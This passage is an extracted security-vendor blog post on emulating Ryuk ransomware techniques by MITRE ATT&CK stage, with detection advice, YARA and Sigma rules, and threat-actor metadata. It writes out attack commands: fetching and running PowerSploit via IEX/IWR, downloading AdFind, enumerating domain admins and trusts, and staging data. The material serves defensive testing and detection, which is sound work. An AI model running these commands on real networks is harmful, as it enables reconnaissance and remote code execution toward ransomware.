-EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiA\r\n4. T1036 - Masquerading Ryuk can create .dll files that actually contain a Rich Text File format document.\r\n5. T1036.005 - Match Legitimate Name or Location Ryuk has constructed legitimate appearing installation\r\nfolder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the\r\npath. For Windows Vista or higher, the path would appear as C:\\Users\\Public .\r\n6. T1027 - Obfuscated Files or Information Ryuk can use anti-disassembly and code transformation\r\nobfuscation techniques.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 22 of 31\n\n7. T1205 - Traffic Signaling Ryuk has used Wake-on-Lan to power on turned off systems for lateral\r\nmovement.\r\nDiscovery\r\n1. T1018 - Remote System Discovery Ryuk uses cmd.exe and powershell.exe to discover remote systems.\r\n1cmd /c \"net view /all\"\r\n2cmd /c \"net view /all /domain\"\r\n3powershell.exe -exec bypass -Command \"\u0026{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType\r\n2. T1057 - Process Discovery Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.\r\n3. T1082 - System Information Discovery Ryuk has called GetLogicalDrives to emumerate all mounted\r\ndrives, and GetDriveTypeW to determine the drive type.\r\n1cmd /c sysinfo\r\n2curl https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -o $env:Temp\\ryuk\r\n3Import-Module $env:Temp\\ryuk\\pv.ps1\r\n4Invoke-CheckLocalAdminAccess\r\n5Find-LocalAdminAccess\r\n6Get-NetSubnet\r\n7Get-NetComputer\r\n8net config workstation\r\n4. T1083 - File and Directory Discovery Ryuk has enumerated files and folders on all mounted drives.\r\n5. T1087 - Account Discovery Ryuk may attempt to get a listing of accounts on a system or within an\r\nenvironment.\r\n1`cmd /c net group \"Enterprise Admins\" /domain\"`\r\n6. T1087.002 - Domain Account Ryuk has the ability to identify domain administrator accounts.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 23 of 31\n\n1`cmd /c net group \"Domain Admins\" /do`\r\n7. T1482 - Domain Trust Discovery Ryuk use Nltest tools to obtain information about the domain.\r\n1`cmd /c nltest /domain_trusts \u003e %USERPROFILE%\\Desktop\\ryuk\\ryuk_adf\\ad_trustdmp.txt`, `cmd /c nltest /dclist:\r\n8. T1614.001 - System Location Discovery: System Language Discovery Ryuk has been observed to query\r\nthe registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language and the value\r\nInstallLanguage . If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423\r\n(Belarusian), it stops execution.\r\n9. T1016 - System Network Configuration Discovery Ryuk has called GetIpNetTable in attempt to identify\r\nall mounted drives and hosts that have Address Resolution Protocol (ARP) entries.\r\n10. T1518 - Software Discovery Ryuk can query the registry to get the list of software installed.\r\n1Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, Disp\r\n2Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object Displa\r\n11. T1518.001 - Security Software Discovery Ryuk can query the CIM instance for the SecurityCenterv2\r\nnamespace to query the installed antivirus product name.\r\n1`Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct`\r\nCommand and Control\r\n1. T1071 - Application Layer Protocol Ryuk may communicate using application layer protocols to avoid\r\ndetection/network filtering by blending in with existing traffic.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 24 of 31\n\n2. T1105 - Ingress Tool Transfer Ryuk transfers a batch script designed to kill a list of processes and services\r\nas mentioned above. Ryuk uses adfind.exe to query active directory.\r\n1curl https://www.joeware.net/downloads/files/AdFind.zip -o $env:TEMP\\ryuk\\af.zip\r\n2Expand-Archive $env:TEMP\\ryuk\\af.zip -DestinationPath $env:TEMP\\ryuk\\af\r\n3\r\n4cd $env:TEMP\\ryuk\\af\r\n5.\\AdFind.exe -f \"(objectcategory=person)\" \u003e $env:TEMP\\ryuk\\af\\ad_users.txt\r\n6.\\AdFind.exe -f \"objectcategory=computer\" \u003e$env:TEMP\\ryuk\\af\\ad_computers.txt\r\n7.\\AdFind.exe -sc trustdmp \u003e $env:TEMP\\ryuk\\af\\trustdmp.txt\r\n8.\\AdFind.exe -subnets -f (objectCategory=subnet)\u003e $env:TEMP\\ryuk\\af\\subnets.txt\r\n9.\\AdFind.exe -gcb -sc trustdmp \u003e $env:TEMP\\ryuk\\af\\trustdmp.txt\r\n10.\\AdFind.exe -sc domainlist \u003e $env:TEMP\\ryuk\\af\\domainlist.txt\r\n11.\\AdFind.exe -sc dcmodes \u003e $env:TEMP\\ryuk\\af\\dcmodes.txt\r\n12.\\AdFind.exe -sc adinfo \u003e $env:TEMP\\ryuk\\af\\adinfo.txt\r\n13.\\AdFind.exe -sc dclist \u003e $env:TEMP\\ryuk\\af\\dclist.txt\r\n14.\\AdFind.exe -sc computers_pwdnotreqd \u003e $env:TEMP\\ryuk\\af\\computer_pwdnotereqd.txt\r\n15\r\n16 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\n17 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13\r\n3. T1573 - Encrypted Channel Ryuk may employ a known encryption algorithm to conceal command and\r\ncontrol traffic rather than relying on any inherent protections provided by a communication protocol.\r\nCollection\r\n1. T1074 - Data Staged Ryuk may stage collected data in a central location or directory prior to Exfiltration.\r\nData may be kept in separate files or combined into one file through techniques such as Archive Collected\r\nData.\r\n1 `powershell \"Compress-Archive $env:TEMP\\ryuk\\ryuk_adf $env:TEMP\\ryuk\\ryuk_adf.zip\"`\r\nLateral Movement\r\n1. T1021.002 - Remote Services: SMB/Windows Admin Shares Ryuk has used the C$ network share for\r\nlateral movement.\r\n2. T1078.002 - Valid Accounts: Domain Accounts Ryuk can use stolen domain admin accounts to move\r\nlaterally within a victim domain.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 25 of 31\n\n3. T1078.003 - Valid Accounts: Local Accounts Adversaries may obtain and abuse credentials of a local\r\naccount as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.\r\n1[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\n2IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b2288\r\n3Invoke-CheckLocalAdminAccess\r\n4Find-LocalAdminAccess\r\nExfiltration\r\n1. T1041 - Exfiltration Over C2 Channel\r\n1type %TEMP%\\ryuk\\af\\ad_users.txt\r\n2type %TEMP%\\ryuk\\af\\ad_computers.txt\r\n3type %TEMP%\\ryuk\\af\\trustdmp.txt\r\n4type %TEMP%\\ryuk\\af\\subnets.txt\r\n5type %TEMP%\\ryuk\\af\\trustdmp.txt\r\n6type %TEMP%\\ryuk\\af\\domainlist.txt\r\n7type %TEMP%\\ryuk\\af\\dcmodes.txt\r\n8type %TEMP%\\ryuk\\af\\adinfo.txt\r\n9type %TEMP%\\ryuk\\af\\dclist.txt\r\n10type %TEMP%\\ryuk\\af\\computer_pwdnotereqd.txt\r\n11type %TEMP%\\ryuk\\af\\ad_trustdmp.txt\r\nImpact\r\n1. T1486 - Data Encrypted for Impact Ryuk has used a combination of symmetric (AES) and asymmetric\r\n(RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file\r\nextension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the\r\ndirectory.\r\n2. T1490 - Inhibit System Recovery Ryuk has used vssadmin Delete Shadows /all /quiet to to delete\r\nvolume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by\r\nthird-party applications.\r\n3. T1489 - Service Stop Ryuk has called kill.bat for stopping services, disabling services and killing\r\nprocesses.\r\nDetection and Mitigation Opportunities\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 26 of 31\n\nFalling victim to a Ryuk ransomware attack is exceptionally costly to an organisation. The operators of the Ryuk\r\nransomware put effort into developing a targeted spear phishing lure, and they demand a high ransom for their\r\ntrouble. However, sometimes, even paying the ransom is not enough to regain a company's access to sensitive or\r\nvaluable data.\r\nFor this reason, it is far better to prevent a ransomware attack rather than react to it. Therefore, it is essential to\r\ndetect the attack at the beginning of the cycle; if your security controls can detect the Ryuk malware before\r\nencryption begins, the incident can be mitigated without harming the organisation. This brings in the need for a\r\ncontinuous assessment of your organisation's security posture to ensure that your security controls are tuned well\r\nand prevent such impactful actions from executing.\r\nAcross the threat analysis of Ryuk, we see commonalities regarding IOCs and TTPs and explicit commands and\r\nactions used by this current version of the ransomware attack. The commands, paired with the detailed account of\r\ncompromise timelines, allow defenders some great insights into building up their defences against Ryuk.\r\nThe bunch of suspicious commands a regular user would never execute include the use of cmd.exe and\r\nPowerShell.exe to run commands like -\r\nnet view\r\nnet group\r\nnltest\r\n-EncodedCommand flag\r\nadfind.exe\r\npowerview.ps1\r\nThe behaviours and TTPs discussed in this article should be logged and flagged. Ryuk targets a variety of services,\r\nfew of which are specific to a third party; therefore, even alerting on services such as Sophos Agent or Veeam\r\nBackup going offline unexpectedly across your environment provides a vital IOC for Ryuk.\r\nFinally, as with any ransomwares the ability to alert on massive and sweeping file creation, deletion, and\r\nencryption is exceptionally insightful to an organisation as it permits defenders to fine-tune their alerts.\r\nIt is recommended that only administrators and end users with specific needs be able to run administrative tools\r\nsuch as cmd, PowerShell, net, wmic , systeminfo , arp , or route . Limiting these tools to only authorised\r\nusers reduces the chance of a compromised end user being able to enumerate system and environmental settings.\r\nAdditionally, from a detection PoV, we can implement various rules for alerts:\r\nUsing splunk to detect Ryuk Ransomware: https://www.splunk.com/en_us/blog/security/detecting-ryuk-using-splunk-attack-range.html\r\nHere's a Yara rule submitted by Marc Elias and Christian Beek of the McAfee ATR Team\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 27 of 31\n\n1 rule Ryuk_Ransomware {\r\n2\r\n3 meta:\r\n4\r\n5 description = \"Ryuk Ransomware hunting rule\"\r\n6 author = \"Christiaan Beek - McAfee ATR team\"\r\n7 date = \"2019-04-25\"\r\n8 rule_version = \"v2\"\r\n9 malware_type = \"ransomware\"\r\n10 malware_family = \"Ransom:W32/Ryuk\"\r\n11 actor_type = \"Cybercrime\"\r\n12 actor_group = \"Unknown\"\r\n13 reference = \"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-t\r\n14\r\n15\r\n16 strings:\r\n17\r\n18 $x1 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\r\n19 $x2 = \"\\\\System32\\\\cmd.exe\" fullword wide\r\n20 $s1 = \"C:\\\\Users\\\\Admin\\\\Documents\\\\Visual Studio 2015\\\\Projects\\\\ConsoleApplication54new crypted\" asc\r\n21 $s2 = \"fg4tgf4f3.dll\" fullword wide\r\n22 $s3 = \"lsaas.exe\" fullword wide\r\n23 $s4 = \"\\\\Documents and Settings\\\\Default User\\\\sys\" fullword wide\r\n24 $s5 = \"\\\\Documents and Settings\\\\Default User\\\\finish\" fullword wide\r\n25 $s6 = \"\\\\users\\\\Public\\\\sys\" fullword wide\r\n26 $s7 = \"\\\\users\\\\Public\\\\finish\" fullword wide\r\n27 $s8 = \"You will receive btc address for payment in the reply letter\" fullword ascii\r\n28 $s9 = \"hrmlog\" fullword wide\r\n29 $s10 = \"No system is safe\" fullword ascii\r\n30 $s11 = \"keystorage2\" fullword wide\r\n31 $s12 = \"klnagent\" fullword wide\r\n32 $s13 = \"sqbcoreservice\" fullword wide\r\n33 $s14 = \"tbirdconfig\" fullword wide\r\n34 $s15 = \"taskkill\" fullword wide\r\n35\r\n36 $op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 }\r\n37 $op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 }\r\n38\r\n39 condition:\r\n40\r\n41 ( uint16(0) == 0x5a4d and\r\n42 filesize \u003c 400KB and\r\n43 ( 1 of ($x*) and\r\n44 4 of them ) and\r\n45 all of ($op*)) or\r\n46 ( all of them )\r\n47 }\r\n48\r\n49 rule Ransom_Ryuk_sept2020 {\r\n50 meta:\r\n51 description = \"Detecting latest Ryuk samples\"\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 28 of 31\n\n52 author = \"McAfe ATR\"\r\n53 date = \"2020-10-13\"\r\n54 malware_type = \"ransomware\"\r\n55 malware_family = \"Ransom:W32/Ryuk\"\r\n56 actor_type = \"Cybercrime\"\r\n57 actor_group = \"Unknown\"\r\n58 hash1 = \"cfdc2cb47ef3d2396307c487fc3c9fe55b3802b2e570bee9aea4ab1e4ed2ec28\"\r\n59 strings:\r\n60 $x1 = \"\\\" /TR \\\"C:\\\\Windows\\\\System32\\\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p \" full\r\n61 $x2 = \"cmd.exe /c \\\"bcdedit /set {default} recoveryenabled No \u0026 bcdedit /set {default}\\\"\" fullword asc\r\n62 $x3 = \"cmd.exe /c \\\"bootstatuspolicy ignoreallfailures\\\"\" fullword ascii\r\n63 $x4 = \"cmd.exe /c \\\"vssadmin.exe Delete Shadows /all /quiet\\\"\" fullword ascii\r\n64 $x5 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\r\n65 $x6 = \"cmd.exe /c \\\"WMIC.exe shadowcopy delete\\\"\" fullword ascii\r\n66 $x7 = \"/C REG ADD \\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"EV\\\" /\r\n67 $x8 = \"W/C REG DELETE \\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"EV\r\n68 $x9 = \"\\\\System32\\\\cmd.exe\" fullword wide\r\n69 $s10 = \"Ncsrss.exe\" fullword wide\r\n70 $s11 = \"lsaas.exe\" fullword wide\r\n71 $s12 = \"lan.exe\" fullword wide\r\n72 $s13 = \"$WGetCurrentProcess\" fullword ascii\r\n73 $s14 = \"\\\\Documents and Settings\\\\Default User\\\\sys\" fullword wide\r\n74 $s15 = \"Ws2_32.dll\" fullword ascii\r\n75 $s16 = \" explorer.exe\" fullword wide\r\n76 $s17 = \"e\\\\Documents and Settings\\\\Default User\\\\\" fullword wide\r\n77 $s18 = \"\\\\users\\\\Public\\\\\" fullword ascii\r\n78 $s19 = \"\\\\users\\\\Public\\\\sys\" fullword wide\r\n79 $s20 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\\" fullword ascii\r\n80\r\n81 $seq0 = { 2b c7 50 e8 30 d3 ff ff ff b6 8c }\r\n82 $seq1 = { d1 e0 8b 4d fc 8b 14 01 89 95 34 ff ff ff c7 45 }\r\n83 $seq2 = { d1 e0 8b 4d fc 8b 14 01 89 95 34 ff ff ff c7 45 }\r\n84 condition:\r\n85 ( uint16(0) == 0x5a4d and\r\n86 filesize \u003c 400KB and\r\n87 ( 1 of ($x*) and 5 of them ) and\r\n88 all of ($seq*)) or ( all of them )\r\n89 }\r\n90\r\n91 rule RANSOM_RYUK_May2021 : ransomware\r\n92 {\r\n93 meta:\r\n94 description = \"Rule to detect latest May 2021 compiled Ryuk variant\"\r\n95 author = \"Marc Elias | McAfee ATR Team\"\r\n96 date = \"2021-05-21\"\r\n97 hash = \"8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a\"\r\n98 version = \"0.1\"\r\n99\r\n100 strings:\r\n101 $ryuk_filemarker = \"RYUKTM\" fullword wide ascii\r\n102\r\n103 $sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 }\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 29 of 31\n\n104 $icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 }\r\n105\r\n106 condition:\r\n107 uint16(0) == 0x5a4d\r\n108 and uint32(uint32(0x3C)) == 0x00004550\r\n109 and filesize \u003c 200KB\r\n110 and ( $ryuk_filemarker\r\n111 or ( $sleep_constants\r\n112 and $icmp_echo_constants ))\r\n113 }\r\nRyuk Behaviour Detection using Sigma Rules:\r\n1title: Ryuk Ransomware\r\n2id: c37510b8-2107-4b78-aa32-72f251e7a844\r\n3status: test\r\n4description: Detects Ryuk ransomware activity\r\n5author: Florian Roth\r\n6references:\r\n7 - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/\r\n8date: 2019/12/16\r\n9modified: 2021/11/27\r\n10logsource:\r\n11category: process_creation\r\n12product: windows\r\n13detection:\r\n14selection:\r\n15 CommandLine|contains|all:\r\n16 - 'Microsoft\\Windows\\CurrentVersion\\Run'\r\n17 - 'C:\\users\\Public\\'\r\n18condition: selection\r\n19fields:\r\n20 - CommandLine\r\n21 - ParentCommandLine\r\n22falsepositives:\r\n23 - Unlikely\r\n24level: critical\r\n25tags:\r\n26 - attack.persistence\r\n27 - attack.t1547.001\r\nConclusion\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 30 of 31\n\nIn summary, this attack flow for the Ryuk ransomware group will help security practitioners evaluate their security\r\nand incident response processes and improve their security control posture against an actor with focused\r\noperations to encrypt your systems and data.\r\nFourCore ATTACK is a continuous security validation platform providing assessments for your entire security\r\ninfrastructure to test and validate your security posture quickly and effectively.\r\nReferences\r\n1. RYUK Ransomware\r\n2. Ryuk Ransomware Detailed Analysis\r\n3. Ryuk targetting web servers\r\n4. The Curious Case of Ryuk Ransomware\r\n5. Ryuk Ransomware: The complete breakdown\r\n6. Ryuk over time\r\n7. Deep Analysis Ryuk\r\n8. Latest Ryuk Trends\r\n9. AnyRun Sim\r\n10. Scythe Simulation Playbook\r\nSource: https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 31 of 31", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp" ], "report_names": [ "ryuk-ransomware-simulation-mitre-ttp" ], "threat_actors": [ { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4", "created_at": "2023-01-06T13:46:38.269054Z", "updated_at": "2026-04-10T02:00:02.90356Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "GOTHIC PANDA", "TG-0110", "Buckeye", "Group 6", "Boyusec", "BORON", "BRONZE MAYFAIR", "Red Sylvan", "Brocade Typhoon" ], "source_name": "MISPGALAXY:APT3", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "06f622cb-3a78-49cf-9a4c-a6007a69325f", "created_at": "2022-10-25T16:07:23.315239Z", "updated_at": "2026-04-10T02:00:04.537826Z", "deleted_at": null, "main_name": "APT 3", "aliases": [ "APT 3", "Boron", "Brocade Typhoon", "Bronze Mayfair", "Buckeye", "G0022", "Gothic Panda", "Group 6", "Operation Clandestine Fox", "Operation Clandestine Fox, Part Deux", "Operation Clandestine Wolf", "Operation Double Tap", "Red Sylvan", "TG-0110", "UPS Team" ], "source_name": "ETDA:APT 3", "tools": [ "APT3 Keylogger", "Agent.dhwf", "BKDR_HUPIGON", "Backdoor.APT.CookieCutter", "Badey", "Bemstour", "CookieCutter", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EXL", "EternalBlue", "HTran", "HUC Packet Transmit Tool", "Hupigon", "Hupigon RAT", "Kaba", "Korplug", "LaZagne", "MFC Huner", "OSInfo", "Pirpi", "PlugX", "RedDelta", "RemoteCMD", "SHOTPUT", "Sogu", "TIGERPLUG", "TTCalc", "TVT", "Thoper", "Xamtrav", "remotecmd", "shareip", "w32times" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434745, "ts_updated_at": 1775792246, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/958b5749de0fa782cddb77262ee59443501bdb95.pdf", "text": "https://archive.orkl.eu/958b5749de0fa782cddb77262ee59443501bdb95.txt", "img": "https://archive.orkl.eu/958b5749de0fa782cddb77262ee59443501bdb95.jpg" } }